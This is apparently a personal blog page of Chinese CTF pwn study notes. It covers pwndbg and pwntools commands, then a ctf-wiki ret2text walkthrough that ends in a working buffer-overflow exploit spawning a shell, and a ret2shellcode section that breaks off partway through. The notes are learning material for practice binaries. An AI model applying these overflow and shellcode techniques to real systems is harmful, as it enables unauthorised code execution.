<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"xiaoxiaoxy1.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>
<meta name="description" content="题录&amp;知识精记">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN">
<meta property="og:url" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/index.html">
<meta property="og:site_name" content="xiaoxiaoxy">
<meta property="og:description" content="题录&amp;知识精记">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321190453216.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321191631835.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321191935613.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321192237309.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321192458522.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321194457925.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321194801166.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321212743720.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321212728076.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321212714333.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321212317869.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321212258169.png">
<meta property="og:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/1.png">
<meta property="article:published_time" content="2022-02-17T08:00:39.000Z">
<meta property="article:modified_time" content="2022-05-19T16:45:06.406Z">
<meta property="article:author" content="xiaoxiaoxy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/image-20220321190453216.png">


<link rel="canonical" href="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://xiaoxiaoxy1.github.io/2022/02/17/PWN/","path":"2022/02/17/PWN/","title":"PWN"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>PWN | xiaoxiaoxy</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="xiaoxiaoxy" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">xiaoxiaoxy</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#esp"><span class="nav-number">1.</span> <span class="nav-text">esp</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pwndbg%E8%B0%83%E8%AF%95%E6%8C%87%E4%BB%A4%E8%AE%B0%E5%BD%95"><span class="nav-number">2.</span> <span class="nav-text">pwndbg调试指令记录</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#exp%E7%BC%96%E5%86%99%E8%AE%B0%E5%BD%95"><span class="nav-number">3.</span> <span class="nav-text">exp编写记录</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#objdump"><span class="nav-number">4.</span> <span class="nav-text">objdump</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ROPgadget"><span class="nav-number">5.</span> <span class="nav-text">ROPgadget</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ctf-wiki-pwn"><span class="nav-number">6.</span> <span class="nav-text">ctf-wiki-pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">6.1.</span> <span class="nav-text">栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E6%9C%ACROP"><span class="nav-number">6.1.1.</span> <span class="nav-text">基本ROP</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2text"><span class="nav-number">6.1.1.1.</span> <span class="nav-text">ret2text</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2shellcode"><span class="nav-number">6.1.1.2.</span> <span class="nav-text">ret2shellcode</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2syscall"><span class="nav-number">6.1.1.3.</span> <span class="nav-text">ret2syscall</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ret2libc"><span class="nav-number">6.1.1.4.</span> <span class="nav-text">ret2libc</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B1%EF%BC%9Aret2libc1"><span class="nav-number">6.1.1.4.1.</span> <span class="nav-text">例1：ret2libc1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B2%EF%BC%9Aret2libc2"><span class="nav-number">6.1.1.4.2.</span> <span class="nav-text">例2：ret2libc2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B3%EF%BC%9Aret2libc3"><span class="nav-number">6.1.1.4.3.</span> <span class="nav-text">例3：ret2libc3</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8D%9A%E5%AE%A2%E6%94%B6%E8%97%8F"><span class="nav-number">7.</span> <span class="nav-text">博客收藏</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E7%AB%A0%E6%94%B6%E8%97%8F"><span class="nav-number">8.</span> <span class="nav-text">文章收藏</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%87%BD%E6%95%B0"><span class="nav-number">9.</span> <span class="nav-text">函数</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%87%E8%AE%B0"><span class="nav-number">10.</span> <span class="nav-text">标记</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E7%BC%96%E8%AF%91%E4%B8%AD%E4%B8%8D%E7%90%86%E8%A7%A3%E7%9A%84%E4%BB%A3%E7%A0%81"><span class="nav-number">10.1.</span> <span class="nav-text">反编译中不理解的代码</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B1%EF%BC%88C-%EF%BC%89"><span class="nav-number">10.1.1.</span> <span class="nav-text">例1（C++）</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#flag-secret"><span class="nav-number">11.</span> <span class="nav-text">flag{_secret_}</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">xiaoxiaoxy</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://xiaoxiaoxy1.github.io/2022/02/17/PWN/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="xiaoxiaoxy">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xiaoxiaoxy">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PWN
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-02-17 16:00:39" itemprop="dateCreated datePublished" datetime="2022-02-17T16:00:39+08:00">2022-02-17</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2022-05-20 00:45:06" itemprop="dateModified" datetime="2022-05-20T00:45:06+08:00">2022-05-20</time>
      </span>

  
</div>

            <div class="post-description">题录&知识精记</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="esp"><a href="#esp" class="headerlink" title="esp"></a>esp</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#总记不住，但又常需要看，所以放到这里</span><br><span class="line">push    #先减esp，再压入</span><br><span class="line">pop     #先取数据再增esp</span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h1 id="pwndbg调试指令记录"><a href="#pwndbg调试指令记录" class="headerlink" title="pwndbg调试指令记录"></a>pwndbg调试指令记录</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#常用的</span></span><br><span class="line">pwndbg&gt; b main      <span class="comment">#break   ，main函数下断点</span></span><br><span class="line">pwndbg&gt; r           <span class="comment">#run     ，运行程序，其会自动在第一个断点处暂停执行</span></span><br><span class="line">pwndbg&gt; ni          <span class="comment">#next    ，单步执行，不进入函数体</span></span><br><span class="line">pwndbg&gt; si          <span class="comment">#step    ，单步执行，进入函数内部</span></span><br><span class="line">pwndbg&gt; p           <span class="comment">#print   ，打印指定变量的值。例：p &amp;buf2，查找buf2的存储地址，</span></span><br><span class="line">pwndbg&gt; vmmap       <span class="comment">#查看当前程序的系统调用库，常用来查看可执行段位置</span></span><br><span class="line">pwndbg&gt; cyclic 200  <span class="comment">#按一定的规则生成200个字符串</span></span><br><span class="line">pwndbg&gt; cyclic -l &lt;数据&gt;     <span class="comment"># 查询&lt;数据&gt;在生成的字符串中的位置，&lt;数据&gt;例子：0x62616164</span></span><br><span class="line">pwndbg&gt; b *&lt;地址&gt;            <span class="comment"># 指定地址处下断点，&lt;地址&gt;例子：0x08048648</span></span><br><span class="line">pwndbg&gt; x/130wx &lt;地址&gt;       <span class="comment"># 打印栈上信息，此处&lt;地址&gt;常用esp指向的栈地址</span></span><br><span class="line">pwndbg&gt; i b         <span class="comment">#info break，查看所有断点</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#不常用</span></span><br><span class="line">pwndbg&gt; c           <span class="comment">#continue，运行至下一断点</span></span><br><span class="line">pwndbg&gt; d           <span class="comment">#delete  ，通常用来删除所有断点，也可以删除指定编号的各类型断点</span></span><br><span class="line">pwndbg&gt; disass      <span class="comment">#~~emble ，反汇编，disassemble main，disassemble /r main</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#暂未用到过的</span></span><br><span class="line">pwndbg&gt; l           <span class="comment">#list    ，显示源程序代码的内容，包括各行代码所在的行号。</span></span><br><span class="line">pwndbg&gt; <span class="keyword">fi</span>          <span class="comment">#finish  ，结束当前正在执行的函数，并在跳出函数后暂停程序的执行。</span></span><br><span class="line">pwndbg&gt; j           <span class="comment">#jump    ，使程序从当前要执行的代码处，直接跳转到指定位置处继续执行后续的代码。</span></span><br><span class="line">pwndbg&gt; q           <span class="comment">#quit    ，终止调试。</span></span><br><span class="line">pwndbg&gt; u           <span class="comment">#until   ，百度去搜</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#高级用法--------下面这一部分记录的比较乱，没办法，之前没接触过</span></span><br><span class="line"><span class="comment"># http://c.biancheng.net/view/8238.html</span></span><br><span class="line"><span class="comment"># https://www.cnblogs.com/zuoanfengxi/p/12763350.html</span></span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> <span class="variable">$eip</span> = 0x8048300    <span class="comment">#设置寄存器eip的值</span></span><br><span class="line">pwndbg&gt; p <span class="variable">$eip</span>                  <span class="comment">#打印</span></span><br><span class="line">pwndbg&gt; x/i <span class="variable">$eip</span>                <span class="comment">#把地址处存的值按照汇编来解析，打印出来</span></span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h1 id="exp编写记录"><a href="#exp编写记录" class="headerlink" title="exp编写记录"></a>exp编写记录</h1><p>宝藏博客：<a target="_blank" rel="noopener" href="https://lantern.cool/note-tool-pwntools/#context">Pwntools | Lantern’s 小站</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##-----------------------------------基本实用操作---------------------------------------##</span></span><br><span class="line"></span><br><span class="line"><span class="comment">##!/usr/bin/env python			  #python文本标识头</span></span><br><span class="line">from pwn import *				  <span class="comment">#导入pwntools中的所有模块</span></span><br><span class="line">from LibcSearcher import *        <span class="comment">#导入LibcSearcher中的所有模块</span></span><br><span class="line">context(arch=<span class="string">&quot;i386&quot;</span>,os=<span class="string">&quot;linux&quot;</span>,log_level=<span class="string">&quot;debug&quot;</span>)</span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-     or    # coding:utf-8 </span></span><br><span class="line"></span><br><span class="line"><span class="comment">#以上四句，写exp的时候加进首部就行了，前两句必加，第四句不加的话你的代码中就不能出现任何中文，注释也一样，否则会报错</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#连接：</span></span><br><span class="line">sh = process(<span class="string">&#x27;本地文件&#x27;</span>)      <span class="comment">#创建本地连接</span></span><br><span class="line">sh = remote(<span class="string">&quot;ip地址&quot;</span>，端口号)  <span class="comment">#远程</span></span><br><span class="line">sh.close()                   <span class="comment">#关闭连接</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#ELF文件操作</span></span><br><span class="line">&gt;&gt;&gt; e = ELF(<span class="string">&#x27;/bin/cat&#x27;</span>)</span><br><span class="line">(e.address)  <span class="comment"># 文件装载的基地址</span></span><br><span class="line">0x400000</span><br><span class="line">&gt;&gt;&gt; <span class="built_in">print</span> hex(e.symbols[<span class="string">&#x27;write&#x27;</span>]) <span class="comment"># 函数地址</span></span><br><span class="line">0x401680</span><br><span class="line">&gt;&gt;&gt; <span class="built_in">print</span> hex(e.got[<span class="string">&#x27;write&#x27;</span>]) <span class="comment"># GOT表的地址</span></span><br><span class="line">0x60b070</span><br><span class="line">&gt;&gt;&gt; <span class="built_in">print</span> hex(e.plt[<span class="string">&#x27;write&#x27;</span>]) <span class="comment"># PLT的地址</span></span><br><span class="line">0x401680</span><br><span class="line">&gt;&gt;&gt; <span class="built_in">print</span> hex(e.search(<span class="string">&#x27;/bin/sh&#x27;</span>).next())<span class="comment"># 字符串/bin/sh的地址</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#I/O模块</span></span><br><span class="line">sh.send(data)                <span class="comment">#发送数据</span></span><br><span class="line">sh.sendline(data)            <span class="comment">#发送一行数据，相当于在数据后面加\n</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;字符串&#x27;</span>,data)<span class="comment">#在遇到字符串后发送数据      </span></span><br><span class="line">sh.interactive()             <span class="comment">#直接进行交互，相当于回到shell的模式，在取得shell之后使用</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#其他</span></span><br><span class="line">buf2_addr = 0x804a080        <span class="comment">#定义变量并为其赋值</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;字符串&#x27;</span>)         <span class="comment">#遇到相同字符串后再进行下一条指令（通常为sendline）</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#结束</span></span><br><span class="line">p.interactive()              <span class="comment">#直接进行交互，相当于回到shell的模式，在取得shell之后使用</span></span><br><span class="line"></span><br><span class="line"><span class="comment">##-----------------------------------基本实用操作---------------------------------------##</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">##-----------------------------------花里胡哨操作---------------------------------------##</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#等效替代</span></span><br><span class="line">ru=lambda x:io.recvuntil(x)</span><br><span class="line">rl=lambda :io.recvline()</span><br><span class="line">sla=lambda x,y:io.sendlineafter(x,y)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">##-----------------------------------花里胡哨操作---------------------------------------##</span></span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h1 id="objdump"><a href="#objdump" class="headerlink" title="objdump"></a>objdump</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#遇见一个收录一个</span></span><br><span class="line">$ objdump -dj .plt ret2libc2		<span class="comment">#查看ret2libc2文件的plt表</span></span><br><span class="line">$ objdump -h &lt;可执行文件&gt;            <span class="comment">#查看所有节，并节选所需内容</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h1 id="ROPgadget"><a href="#ROPgadget" class="headerlink" title="ROPgadget"></a>ROPgadget</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#遇则收录</span></span><br><span class="line">$ ROPgadget --binary ret2libc2 --only <span class="string">&quot;pop|ret&quot;</span>		<span class="comment">#查找文件中的pop或ret字段</span></span><br></pre></td></tr></table></figure>

<br/>

<p>———————————————————————-分界线———————————————————————————————————–</p>
<br/>

<h1 id="ctf-wiki-pwn"><a href="#ctf-wiki-pwn" class="headerlink" title="ctf-wiki-pwn"></a><center><font color="red">ctf-wiki-pwn</font></center></h1><h2 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h2><h3 id="基本ROP"><a href="#基本ROP" class="headerlink" title="基本ROP"></a>基本ROP</h3><h4 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h4><p>知识点：pwn相关的一些小技巧，偏移寻找、cyclic</p>
<p>注：个人笔记，重在个人对知识点的复习。</p>
<p>解题思路：存在 system(“/bin/sh”);  利用溢出修改ret指令处的地址控制程序跳转过去</p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2text">ctf-wiki-ret2text</a></p>
<p>点击下载：<a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text">ret2text</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># pwn相关的一些小技巧</span></span><br><span class="line">$ file &lt;文件名&gt;        <span class="comment">#查看文件信息   </span></span><br><span class="line">$ checksec &lt;文件名&gt;    <span class="comment">#查看文件的保护机制  </span></span><br><span class="line">$ gdb &lt;文件名&gt;         <span class="comment">#gdb调试文件</span></span><br><span class="line">ida中 tab、空格、<span class="built_in">shift</span>+f12、Imports栏框</span><br><span class="line">gdb中 b *&lt;地址&gt;、ni、x/136wx &lt;esp指向的栈地址&gt;、info registers查看寄存器值</span><br><span class="line">python中 from pwn import * 、cyclic()、cyclic_find()</span><br><span class="line"></span><br><span class="line">$ x/136wx 0xffffd0d0  <span class="comment">#比较常用也比较容易忘</span></span><br></pre></td></tr></table></figure>

<br/>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#解题过程</span></span><br><span class="line">1、$ file ret2text       <span class="comment">#得知文件为32位可执行文件</span></span><br><span class="line">2、$ checksc ret2text    <span class="comment">#查看文件保护机制，未开启任何保护(说明有很多思路可以使用)</span></span><br><span class="line">3、打开32位ida查询主函数，发现gets()函数(存在栈溢出)</span><br><span class="line">4、在secure函数中查找到 system(<span class="string">&quot;/bin/sh&quot;</span>); 字样，得到其位置0x0804863A</span><br><span class="line">5、gdb调试查找偏移值，计算得偏移值112</span><br><span class="line">6、编写解题脚本</span><br></pre></td></tr></table></figure>

<br/>

<p>4、函数窗口中点击secure函数，tab键（+空格键）得到如下界面。</p>
<p><img src="image-20220321190453216.png" alt="image-20220321190453216"></p>
<br/>

<p>5、偏移值计算</p>
<p><img src="image-20220321191631835.png" alt="image-20220321191631835"></p>
<p>单走ni到达gets()函数，如下：</p>
<p><img src="image-20220321191935613.png" alt="image-20220321191935613"></p>
<p>新建命令行，打开python，导入pwntools中的所有模块，cyclic()生成200个较有规律的随机字符并输入到上图中的程序中，如下：</p>
<p><img src="image-20220321192237309.png" alt="image-20220321192237309"></p>
<p><img src="image-20220321192458522.png" alt="image-20220321192458522"></p>
<p>由上图的值ebp指向的是栈的0xffffd158位置，我们利用$ x/136wx 0xffffd0d0（0xffffd0d0是esp指向的栈位置，栈是从高地址向低地址生长的所以esp在ebp的下方，这句指令的意思是从0xffffd0d0开始向高地址按每个数据4字节打印136个数据）打印栈上信息，如下：</p>
<p><img src="image-20220321194457925.png" alt="image-20220321194457925"></p>
<p>上图中的0x62616163就是我们ebp指向的栈上存储的信息，翻译成字符就是baac，但由于内存小端序存值的原因，我们需倒序，因此要查找的字符为caab，我们回到python中查询caab字符串的位置，如下：</p>
<p><img src="image-20220321194801166.png" alt="image-20220321194801166"></p>
<p>因此从我们输入的第一个字符到ebp的初始位置相距108个字符，而我们的ret指令在ebp的上一个位置（为什么ebp的上一个位置为ret指令？自学下汇编，自己写个简单的程序反编译分析一下你就知道了），而我们要把  system(“/bin/sh”);  的位置地址 0x0804863A 覆盖到ret指令调用的栈位置（ret指令执行时就从该栈位置出取处地址并跳转过去），所以还要+4个字节（ebp占用4字节）即112个字符。</p>
<p>最后我们构造的payload如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##!/usr/bin/env python</span></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2text&#x27;</span>)</span><br><span class="line">target = 0x804863a</span><br><span class="line">sh.sendline(<span class="string">&#x27;A&#x27;</span> * 112 + p32(target))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>注：之后的题解不会写得如此详细，因为是个人笔记，重在个人复习，所以一些特别基础的知识及操作之后不再写出。（倘若碰巧你也是个pwn的初学者，欢迎找我讨论）</p>
<br/>

<br/>

<h4 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h4><p>知识点：shellcode植入 、asm(shellcraft.sh()) 、ljust()</p>
<p>解题思路：.bss段可执行，且存在将输入值copy到.bss段的函数，借助溢出执行shellcode</p>
<p>原文链接: <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2shellcode">ctf-wiki-ret2shellcode</a></p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2shellcode/ret2shellcode-example/ret2shellcode">ret2shellcode</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">解题步骤：</span><br><span class="line">1、ida：</span><br><span class="line">    <span class="comment">#ida查看main函数分析，存在gets()函数，栈溢出</span></span><br><span class="line">    <span class="comment">#发现strncpy()函数将输入的字符串复制到了buf2处，跟进buf2</span></span><br><span class="line">    <span class="comment">#发现buf2存在与.bss段</span></span><br><span class="line">    <span class="comment">#记录.bss段的起始地址：0x0804A040-0x0804A080</span></span><br><span class="line"></span><br><span class="line">2、gdb:</span><br><span class="line">    <span class="comment">#$ vmmap查看当前程序的系统调用库，发现.bss所在段具有可执行权限</span></span><br><span class="line">    <span class="comment">#说明可以利用溢出跳转至.bss段处，再由系统执行.bss处被copy过去的shellcode</span></span><br><span class="line">    <span class="comment">#注：我们的输入值会由strncpy()函数copy给buf2，而buf2在.bss段上</span></span><br><span class="line">    <span class="comment">#偏移计算，偏移值为112个字符</span></span><br><span class="line">    </span><br><span class="line">3、编写解题脚本</span><br><span 